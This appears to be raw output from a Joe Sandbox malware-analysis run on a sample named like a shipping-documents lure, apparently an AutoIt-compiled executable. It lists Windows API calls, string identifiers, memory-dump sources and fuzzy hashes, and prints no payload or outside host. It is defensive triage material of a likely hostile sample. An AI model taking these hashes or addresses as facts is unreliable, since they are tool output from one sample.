                                                • Instruction ID: 6ea282da8858b4fc851c5025c3640d86739d00d7f8abe3d7f71f942b7e564764
                                                • Opcode Fuzzy Hash: 5aff4ed33e123a1cd7f5a09e8e60abc07d51e9c4e6bd6da59c36939baad834ea
                                                • Instruction Fuzzy Hash: 418109F1600315BACF61AA64CC92FFE776FEF11300F144029F945AA6C6EB61DA91C3A5
                                                APIs
                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00718D34
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00718D45
                                                • CharNextW.USER32(0000014E), ref: 00718D74
                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00718DB5
                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00718DCB
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00718DDC
                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00718DF9
                                                • SetWindowTextW.USER32(?,0000014E), ref: 00718E45
                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00718E5B
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00718E8C
                                                • _memset.LIBCMT ref: 00718EB1
                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00718EFA
                                                • _memset.LIBCMT ref: 00718F59
                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00718F83
                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 00718FDB
                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 00719088
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 007190AA
                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007190F4
                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00719121
                                                • DrawMenuBar.USER32(?), ref: 00719130
                                                • SetWindowTextW.USER32(?,0000014E), ref: 00719158
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                • String ID: 0
                                                • API String ID: 1073566785-4108050209
                                                • Opcode ID: 6ea1afa11a5ec0ab88f2553cae1adbf8c9de7773e69c3c0b1a74f6012f31432f
                                                • Instruction ID: afaa40fdfd61f504eb24011725988af7a46595d024019542d77e1107b017132a
                                                • Opcode Fuzzy Hash: 6ea1afa11a5ec0ab88f2553cae1adbf8c9de7773e69c3c0b1a74f6012f31432f
                                                • Instruction Fuzzy Hash: BFE1A270900209ABDF60DF68DC84EEE7BB9EF09710F008159FA159A2D0DB788AC5DF65
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 00714C51
                                                • GetDesktopWindow.USER32 ref: 00714C66
                                                • GetWindowRect.USER32(00000000), ref: 00714C6D
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00714CCF
                                                • DestroyWindow.USER32(?), ref: 00714CFB
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00714D24
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00714D42
                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00714D68
                                                • SendMessageW.USER32(?,00000421,?,?), ref: 00714D7D
                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00714D90
                                                • IsWindowVisible.USER32(?), ref: 00714DB0
                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00714DCB
                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00714DDF
                                                • GetWindowRect.USER32(?,?), ref: 00714DF7
                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00714E1D
                                                • GetMonitorInfoW.USER32(00000000,?), ref: 00714E37
                                                • CopyRect.USER32(?,?), ref: 00714E4E
                                                • SendMessageW.USER32(?,00000412,00000000), ref: 00714EB9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                • String ID: ($0$tooltips_class32
                                                • API String ID: 698492251-4156429822
                                                • Opcode ID: 3255e33ed484559a3f89dbdcaac323d099e2d945159ee8b07305f8b401e6626e
                                                • Instruction ID: 346fac13b1c166bd07900917a1310099658fedc4cb54c797146b71eff2e9a704
                                                • Opcode Fuzzy Hash: 3255e33ed484559a3f89dbdcaac323d099e2d945159ee8b07305f8b401e6626e
                                                • Instruction Fuzzy Hash: 25B1AC71608340AFDB44DF68C849BAABBE5FF88710F00891CF5899B2A1D775EC44CBA5
                                                APIs
                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 006F46E8
                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 006F470E
                                                • _wcscpy.LIBCMT ref: 006F473C
                                                • _wcscmp.LIBCMT ref: 006F4747
                                                • _wcscat.LIBCMT ref: 006F475D
                                                • _wcsstr.LIBCMT ref: 006F4768
                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 006F4784
                                                • _wcscat.LIBCMT ref: 006F47CD
                                                • _wcscat.LIBCMT ref: 006F47D4
                                                • _wcsncpy.LIBCMT ref: 006F47FF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                • API String ID: 699586101-1459072770
                                                • Opcode ID: 7c9755e09d5cc595400eaabc0da0ef2140b778955af4fd907a325cd9b133252c
                                                • Instruction ID: f9d8fc937fac71fa51d97a728af8301078870aade39a72ffca8cd2f5572fb5b3
                                                • Opcode Fuzzy Hash: 7c9755e09d5cc595400eaabc0da0ef2140b778955af4fd907a325cd9b133252c
                                                • Instruction Fuzzy Hash: 7F4117B16402057AE710BB648C46EFF77AEDF42710F00416DF904E62C2EF78DA8197A9
                                                APIs
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006928BC
                                                • GetSystemMetrics.USER32(00000007), ref: 006928C4
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006928EF
                                                • GetSystemMetrics.USER32(00000008), ref: 006928F7
                                                • GetSystemMetrics.USER32(00000004), ref: 0069291C
                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00692939
                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00692949
                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0069297C
                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00692990
                                                • GetClientRect.USER32(00000000,000000FF), ref: 006929AE
                                                • GetStockObject.GDI32(00000011), ref: 006929CA
                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 006929D5
                                                  • Part of subcall function 00692344: GetCursorPos.USER32(?), ref: 00692357
                                                  • Part of subcall function 00692344: ScreenToClient.USER32(007567B0,?), ref: 00692374
                                                  • Part of subcall function 00692344: GetAsyncKeyState.USER32(00000001), ref: 00692399
                                                  • Part of subcall function 00692344: GetAsyncKeyState.USER32(00000002), ref: 006923A7
                                                • SetTimer.USER32(00000000,00000000,00000028,00691256), ref: 006929FC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                • String ID: AutoIt v3 GUI
                                                • API String ID: 1458621304-248962490
                                                • Opcode ID: d4da7d4047f2cad16fcdf7026f1910a9b72fe07fbf455affe52ac81d6f47651b
                                                • Instruction ID: 9c8082148b6db8e299c0319db1f575c58368616e05849c4b59757091073a0c4d
                                                • Opcode Fuzzy Hash: d4da7d4047f2cad16fcdf7026f1910a9b72fe07fbf455affe52ac81d6f47651b
                                                • Instruction Fuzzy Hash: 86B15E7160020AAFDF14DFA8DC55BED7BBAFB08315F108129FA19A72E0DB74A851CB54
                                                APIs
                                                • CharUpperBuffW.USER32(?,?), ref: 007140F6
                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007141B6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: BuffCharMessageSendUpper
                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                • API String ID: 3974292440-719923060
                                                • Opcode ID: ac818c4af1e50849401d9b95c193e6ecdb273095b3069d725a7a9a373f37245a
                                                • Instruction ID: 24879689870d17a439caa83e60032183f78b1215aecafa1b117e7af7487ec17b
                                                • Opcode Fuzzy Hash: ac818c4af1e50849401d9b95c193e6ecdb273095b3069d725a7a9a373f37245a
                                                • Instruction Fuzzy Hash: 95A194702143019FCB54EF28C851AAAB7A6BF44314F14896CF8A69B7D2DB34EC85CB55
                                                APIs
                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00705309
                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00705314
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0070531F
                                                • LoadCursorW.USER32(00000000,00007F03), ref: 0070532A
                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00705335
                                                • LoadCursorW.USER32(00000000,00007F01), ref: 00705340
                                                • LoadCursorW.USER32(00000000,00007F81), ref: 0070534B
                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00705356
                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00705361
                                                • LoadCursorW.USER32(00000000,00007F86), ref: 0070536C
                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00705377
                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00705382
                                                • LoadCursorW.USER32(00000000,00007F82), ref: 0070538D
                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00705398
                                                • LoadCursorW.USER32(00000000,00007F04), ref: 007053A3
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 007053AE
                                                • GetCursorInfo.USER32(?), ref: 007053BE
                                                • GetLastError.KERNEL32(00000001,00000000), ref: 007053E9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Cursor$Load$ErrorInfoLast
                                                • String ID:
                                                • API String ID: 3215588206-0
                                                • Opcode ID: a76bcffefebcfecd1697a5a907c29908e6378cd475d7c24a228f83ca65eb633a
                                                • Instruction ID: 45a49ae12b5482cf63d8e58d39386a29f915ea3fb6e915511a50a57d3ed5eacc
                                                • Opcode Fuzzy Hash: a76bcffefebcfecd1697a5a907c29908e6378cd475d7c24a228f83ca65eb633a
                                                • Instruction Fuzzy Hash: 1D415270E04319AADB109FBA8C499AFFEF8EF51B50B10452FF509E72D0DAB894018E65
                                                APIs
                                                • GetClassNameW.USER32(?,?,00000100), ref: 006EAAA5
                                                • __swprintf.LIBCMT ref: 006EAB46
                                                • _wcscmp.LIBCMT ref: 006EAB59
                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 006EABAE
                                                • _wcscmp.LIBCMT ref: 006EABEA
                                                • GetClassNameW.USER32(?,?,00000400), ref: 006EAC21
                                                • GetDlgCtrlID.USER32(?), ref: 006EAC73
                                                • GetWindowRect.USER32(?,?), ref: 006EACA9
                                                • GetParent.USER32(?), ref: 006EACC7
                                                • ScreenToClient.USER32(00000000), ref: 006EACCE
                                                • GetClassNameW.USER32(?,?,00000100), ref: 006EAD48
                                                • _wcscmp.LIBCMT ref: 006EAD5C
                                                • GetWindowTextW.USER32(?,?,00000400), ref: 006EAD82
                                                • _wcscmp.LIBCMT ref: 006EAD96
                                                  • Part of subcall function 006B386C: _iswctype.LIBCMT ref: 006B3874
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                • String ID: %s%u
                                                • API String ID: 3744389584-679674701
                                                • Opcode ID: d5932cca46065428f25e6589819a0f3f859a7e2459641939e95d02c188e88989
                                                • Instruction ID: c1f21cb962b910728fd75d5776ad60a63985f0bcec390429a01e95c09265a26a
                                                • Opcode Fuzzy Hash: d5932cca46065428f25e6589819a0f3f859a7e2459641939e95d02c188e88989
                                                • Instruction Fuzzy Hash: F0A1BF71205386AFD714DFA5C884BEAB7EAFF04355F10862DF99982290DB30F945CB92
                                                APIs
                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 006EB3DB
                                                • _wcscmp.LIBCMT ref: 006EB3EC
                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 006EB414
                                                • CharUpperBuffW.USER32(?,00000000), ref: 006EB431
                                                • _wcscmp.LIBCMT ref: 006EB44F
                                                • _wcsstr.LIBCMT ref: 006EB460
                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 006EB498
                                                • _wcscmp.LIBCMT ref: 006EB4A8
                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 006EB4CF
                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 006EB518
                                                • _wcscmp.LIBCMT ref: 006EB528
                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 006EB550
                                                • GetWindowRect.USER32(00000004,?), ref: 006EB5B9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                • String ID: @$ThumbnailClass
                                                • API String ID: 1788623398-1539354611
                                                • Opcode ID: 3b8b8897e9c42aa2fbf2d5e82abc2c67a1e5a9d02d7618a8959d00257f2850fd
                                                • Instruction ID: 93df8c1801e0b8c5cd826ca868d13635fef527eec6576ac13504b3830df50861
                                                • Opcode Fuzzy Hash: 3b8b8897e9c42aa2fbf2d5e82abc2c67a1e5a9d02d7618a8959d00257f2850fd
                                                • Instruction Fuzzy Hash: AE81DC710093859BDB00DF16C885FEB7BEAEF44314F049469FD898A2A6DB34DD49CBA1
                                                APIs
                                                  • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                • DragQueryPoint.SHELL32(?,?), ref: 0071C917
                                                  • Part of subcall function 0071ADF1: ClientToScreen.USER32(?,?), ref: 0071AE1A
                                                  • Part of subcall function 0071ADF1: GetWindowRect.USER32(?,?), ref: 0071AE90
                                                  • Part of subcall function 0071ADF1: PtInRect.USER32(?,?,0071C304), ref: 0071AEA0
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0071C980
                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0071C98B
                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0071C9AE
                                                • _wcscat.LIBCMT ref: 0071C9DE
                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0071C9F5
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0071CA0E
                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0071CA25
                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0071CA47
                                                • DragFinish.SHELL32(?), ref: 0071CA4E
                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0071CB41
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pru
                                                • API String ID: 169749273-4085695995
                                                • Opcode ID: 1c9c2f7c52becb39034883a5676ec7275fe8ae0a30ff0dbeb189ff90e977398d
                                                • Instruction ID: db47437a1c7ef583f35926b76516f961648f54fb8fc53a153f9de8817d420e23
                                                • Opcode Fuzzy Hash: 1c9c2f7c52becb39034883a5676ec7275fe8ae0a30ff0dbeb189ff90e977398d
                                                • Instruction Fuzzy Hash: 34616C71108301AFC701DF68DC89D9FBBE9EF89710F00492DF591971A1DB749A49CB5A
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                • API String ID: 1038674560-1810252412
                                                • Opcode ID: 59b41423b7e627414b98c8302ecfd0946ddbac1119fc056b65e95fe042998493
                                                • Instruction ID: 5646bb5f415eedd766fb8197096fd751369d8bcf389d3a3b328020140fe803d0
                                                • Opcode Fuzzy Hash: 59b41423b7e627414b98c8302ecfd0946ddbac1119fc056b65e95fe042998493
                                                • Instruction Fuzzy Hash: FB31ABB0A45345AADF51FA61CD43EFF77AA9F20750F600028B601725E2EF656F08C69A
                                                APIs
                                                • LoadIconW.USER32(00000063), ref: 006EC4D4
                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 006EC4E6
                                                • SetWindowTextW.USER32(?,?), ref: 006EC4FD
                                                • GetDlgItem.USER32(?,000003EA), ref: 006EC512
                                                • SetWindowTextW.USER32(00000000,?), ref: 006EC518
                                                • GetDlgItem.USER32(?,000003E9), ref: 006EC528
                                                • SetWindowTextW.USER32(00000000,?), ref: 006EC52E
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 006EC54F
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 006EC569
                                                • GetWindowRect.USER32(?,?), ref: 006EC572
                                                • SetWindowTextW.USER32(?,?), ref: 006EC5DD
                                                • GetDesktopWindow.USER32 ref: 006EC5E3
                                                • GetWindowRect.USER32(00000000), ref: 006EC5EA
                                                • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 006EC636
                                                • GetClientRect.USER32(?,?), ref: 006EC643
                                                • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 006EC668
                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 006EC693
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                • String ID:
                                                • API String ID: 3869813825-0
                                                • Opcode ID: d52d453a1377952d192702cfd08e0e3d235f1f52d82ff9a5497c3ed171040d71
                                                • Instruction ID: 5eeb33b0a499483e05a2e65a1b3bf4a393c29fc462b8b3008b2407a2e566b532
                                                • Opcode Fuzzy Hash: d52d453a1377952d192702cfd08e0e3d235f1f52d82ff9a5497c3ed171040d71
                                                • Instruction Fuzzy Hash: 48518E31900709AFDB20DFA9DD85BAEBBF6FF04715F008528E686A26A0C774A915CB44
                                                APIs
                                                • _memset.LIBCMT ref: 0071A4C8
                                                • DestroyWindow.USER32(?,?), ref: 0071A542
                                                  • Part of subcall function 00697D2C: _memmove.LIBCMT ref: 00697D66
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0071A5BC
                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0071A5DE
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0071A5F1
                                                • DestroyWindow.USER32(00000000), ref: 0071A613
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00690000,00000000), ref: 0071A64A
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0071A663
                                                • GetDesktopWindow.USER32 ref: 0071A67C
                                                • GetWindowRect.USER32(00000000), ref: 0071A683
                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0071A69B
                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0071A6B3
                                                  • Part of subcall function 006925DB: GetWindowLongW.USER32(?,000000EB), ref: 006925EC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                • String ID: 0$tooltips_class32
                                                • API String ID: 1297703922-3619404913
                                                • Opcode ID: 34e8b531ee459f84cdd3ff4a9687fd20fee6f6835b85c24da0d64a04367e5b2e
                                                • Instruction ID: 2c56a7cb67c439dd9bb38a7f8cdf8e8c0073db47b0d7c509e6625a306732128a
                                                • Opcode Fuzzy Hash: 34e8b531ee459f84cdd3ff4a9687fd20fee6f6835b85c24da0d64a04367e5b2e
                                                • Instruction Fuzzy Hash: 7371A171240305AFD720DF28CC45FAA7BE6FB88305F48852DF985872A0D779E946CB56
                                                APIs
                                                • CharUpperBuffW.USER32(?,?), ref: 007146AB
                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007146F6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
